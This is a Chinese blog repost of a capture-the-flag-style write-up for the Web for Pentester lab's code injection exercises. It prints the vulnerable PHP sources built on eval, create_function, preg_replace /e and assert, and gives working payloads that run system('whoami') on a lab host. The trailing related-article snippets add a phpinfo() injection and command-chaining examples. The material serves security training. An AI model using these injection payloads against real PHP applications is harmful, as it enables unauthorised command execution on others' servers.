Web for pentester_writeup之Code injection篇

最新推荐文章于 2023-02-07 19:39:32 发布
最新推荐文章于 2023-02-07 19:39:32 发布
阅读量359 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/liliyuanshangcao/p/11320963.html
版权

Web for pentester_writeup之Code injection篇

Code injection(代码注入)

Example 1

1605154-20190808143257650-1309948164.png

<1> name=hacker’ 添加一个单引号

1605154-20190808143311050-821937799.png

<2> name=hacker” 添加一个双引号

1605154-20190808143356350-2108491842.png

返回报错信息,分析可知执行了eval()程序

继续测试

1605154-20190808143459406-1888671742.png

这块有点复杂,我们先看一下源代码

<?php require_once("../header.php"); ?> 
<?php 
    $str="echo \"Hello ".$_GET['name']."!!!\";"; 
    eval($str); 
?> 
<?php require_once("../footer.php"); ?>

可知eval实际执行的函数是 echo "Hello ".$_GET['name']."!!!"; ,这条语句中点号.是字符串拼接.
根据上述信息我们可以构造一个执行whoami命令的脚本

Payload 1 结尾使用赋值的方法闭合语句
http://192.168.219.136/codeexec/example1.php?name=hacker".system('whoami'); $dummy="

1605154-20190808143538991-707665184.png

实际执行的语句为

echo "Hello ".hacker".system('whoami'); $dummy="."!!!"; 拼接一下变为

echo "Hello hacker".system('whoami'); $dummy="!!!";

从页面返回可以看出,系统先执行了whoami命令,然后执行输出

Payload 2
http://192.168.219.136/codeexec/example1.php?name=hacker".system('whoami');%23

1605154-20190808143547121-1368557021.png

http://192.168.219.136/codeexec/example1.php?name=hacker".system('whoami');//

1605154-20190808143555419-1257008802.png

以上2种方式都可以成功执行命令,结尾直接使用#号或//注释后面的内容

Example 2

1605154-20190808143708057-1571194764.png

使用单引号 ?order=id'

1605154-20190808143728771-721286394.png

发现使用的是usort()函数

查看源代码

if (isset($order)) { 
   usort($users, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');')); 
}

尝试闭合构造如下:
?order=id;}// 报错Parse error: syntax error, unexpected ';' 我们可能少了一个或者多个括号。
?order=id);}// 警告Warning: strcmp() expects exactly 2 parameters, 1 given到报的不是语法错误,这个应该可行。
?order=id));}// 继续加括号,报错Parse error: syntax error, unexpected ')'应该是多括号的原因。

Payload
http://192.168.219.136/codeexec/example2.php?order=id);}system('whoami');//

1605154-20190808143741019-782621294.png

Example 3

1605154-20190808143746427-1102653696.png

查看源代码 
<?php require_once("../header.php"); ?> 
<?php 
echo preg_replace($_GET["pattern"], $_GET["new"], $_GET["base"]); 
?> 
<?php require_once("../footer.php"); ?>

preg_replace()函数:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。
参数说明:
$pattern: 要搜索的模式,可以是字符串或一个字符串数组。
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
$limit: 可选,对于每个模式用于每个 subject 字符串的最大可替换次数。默认是-1(无限制)。
$count: 可选,为替换执行的次数。
/e修正符使preg_replace()将replacement参数当作php代码执行,前提是subject中有pattern的匹配。
我们给pattern参数加上/e修正符,并使得subject中有pattern的匹配,并把replacement改为我们要执行的命令

Payload
http://192.168.219.136/codeexec/example3.php?new=system('whoami')&pattern=/lamer/e&base=Hello%20lamer

1605154-20190808143759155-67554670.png

注:php5.5版本以上就废弃了preg_replace函数中 /e 这个修饰符,转而修改成 preg_replace _callback

Example 4

1605154-20190808143810190-1192216016.png

老套路,发现assert()函数

Payload
http://192.168.219.136/codeexec/example4.php?name=hacker'.system(whoami).'

1605154-20190808143843468-553703910.png

对PHP函数代码执行不是特别熟悉,所以主要参考了以下文章,写的很详细

参考文章:https://www.freebuf.com/sectool/168653.html

转载于:https://www.cnblogs.com/liliyuanshangcao/p/11320963.html

ditanji3425
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2023年05月 网络安全高级班 076.WEB渗透与安全(Web_For_Pentester通关实战)
时光隧道
05-29 7970
Web_For_Pentester 是一个针对网络渗透测试的工具集合,它包含了一系列用于应用程序安全测试的工具和技术。这些工具和技术可以用于发现和利用网站中的漏洞,以便识别和修复安全问题。Web_For_Pentester 可以帮助攻击者发现和利用网站的漏洞,也可以帮助安全专家评估网站的安全性。
CodeInjector 代码注入工具
10-17
CodeInjector 代码注入工具 CodeInjector 代码注入工具CodeInjector 代码注入工具
Web for Pentester -- code injection
weixin_30790841的博客
01-17 177
1.直接利用eval()函数 http://192.168.118.143/codeexec/example1.php?name=hacker%22;phpinfo();$aa=%22 源码: 2. 利用create_function创建匿名函数进行代码注入。 http://192.168.118.143/codeexec/example2.php?order=name...
Web for pentester_writeup之Commands injection
ditanji3425的博客
08-08 282
Web for pentester_writeup之Commands injection Commands injection(命令行注入) 代码注入和命令行注入有什么区别呢,代码注入涉及比较广泛,凡是由于过滤不严格或者是逻辑问题导致的可以插入恶意代码,都属于代码注入。而命令注入就局限于system函数的过滤不严格导致执行了系统命令。 总之就是代码注入主要是执行php代码,而命令注入主...
web for pentester之command injection
Jone_Dom的博客
05-05 789
web for pentester之命令执行漏洞 (命令执行漏洞) 开启pentester虚拟机: 开启之后,输入ipconfig查看虚拟机ip地址;我这里虚拟机的ip地址为192.168.145.131; 在物理机上的Firefox地址栏中输http://192.168.145.131 进入web for pentester主页: 点击选择Commands injection(命令执行)测试...
Web_for_Pentester_I代码执行漏洞
最新发布
贝隆的博客
02-07 357
Web_for_Pentester_I代码执行漏洞
web_for_pentester.pdf
04-02
Web for pentester是一款由安全研究者Louis Nyffenegger开发的渗透测试平台,旨在帮助用户掌握Web漏洞检测的实战技能。从给出的部分内容来看,这份材料涉及了Web渗透测试的基础知识,Web安全模型,常见的Web安全风险...
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
web for pentester 之xss
Merc_A的专栏
11-09 1688
1、很明显了,地址栏里name=hacker。直接name=alert(1)。 2、还是先试一下alert(1),,输出只有alert,script不见了,先换大小写试一下,成功了。。 3、还是先试一下alert(1),发现还是只输出了alert(1),换大小写也没有用,我的和呢,肯定是后台被注释掉了,那就这样pt>alert(1)ript>。 这样他注释掉一个我们还有一个。 4、你会
web_for_pentester.zip
11-26
web_for_pentester
JavaScript中eval的使用
weixin_34315485的博客
12-04 78
两个主要原因不建议使用eval函数:1. Performance Concern 性能消耗2. Code Injection 代码注入1、eval函数:把一个字符串当作一个js表达式一样去执行它. 2、语法:eval(strScript) 注:参数strScript是必填项 3、使用说明 (1)它是有返回值的,如果参数字符串是一个表达式,就会返回表达式的值...
Web 应用渗透测试 01 - 命令注入(Code Injection)之 create_function
0pr
02-04 1107
文章将讨论 PHP Web 应用中 **create_function** 的命令注入。命令注入,究其根源,都是未对用户提供的输入做合理过滤造成的。当然,编程语言本身内置的危险方法的使用,是命令注入频发的另一原因。
函数注入攻击
要啥啥不行,偷懒第一名
10-21 1850
实验目的与要求 1.了解eval注入的概念 2.了解eval注入攻击的方式 3.掌握防范攻击的方法 预备知识 eval注入攻击    Eval函数会将输入的字符串参数作为PHP程序代码来执行,用户可以将PHP程序代码保存在数据库的字段中,然后读入到eval函数中来执行。    Eval函数的用法如下: mixed eval ( string code_str )    code str是代码字符串,eval注入(eval injection)攻击发生在黑客能够控制eval函数...
iosline.php注入,PentesterLab新手教程(一):代码注入
weixin_39855944的博客
03-24 243
PentesterLab 简介Web for pentester 是国外安全研究者开发的的一款渗透测试平台。这个平台包含的主要漏洞如下:Code injection (代码注入)Commands injection(命令行注入)XSS(跨站脚本)SQL injections(sql注入)File include(文件包含)LDAP attacks(LDAP攻击)File Upload(文件上传)X...
关于PHP代码审计的一些题目
Animation77的博客
09-07 1866
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
【9】WEB安全学习----PHP基础语法二
尚未佩妥剑 转眼便江湖
09-02 229
目录 一、流程控制 1、IF语句 2、预定义变量 3、Switch语句 4、For循环 5、While循环 二、数组 创建数组 使用数组 多维数组 遍历数组 数组运算符 三、系统函数 字符串函数 数学函数 日期时间函数 四、自定义函数 定义函数 函数的参数 变量的作用域 传值和传引用 变量函数 回调函数 递归函数 匿名函数 可变参数 一、流程控...
Fortify漏洞之Dynamic Code Evaluation: Code Injection(动态脚本注入)和 Password Management: Hardcoded Password(密...
arkqyo2595的博客
05-14 1739
  继续对Fortify的漏洞进行总结,本主要针对 Dynamic Code Evaluation: Code Injection(动态脚本注入)和Password Management: Hardcoded Password(密码硬编码)的漏洞进行总结,如下: 1.1、产生原因:   许多现代编程语言都允许动态解析源代码指令。这使得程序员可以执行基于用户输入的动态指令。...
【渗透测试学习平台】 web for pentester -6.命令执行
07-21 1105
  命令执行漏洞 windows支持: |           ping 127.0.0.1|whoami           ||              ping  2 || whoami (哪条名令为真执行那条) &amp;  &amp;&amp;   ping 127.0.0.1&amp;&amp;whoami Linux支持: ;      127.0.0.1;whoami...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值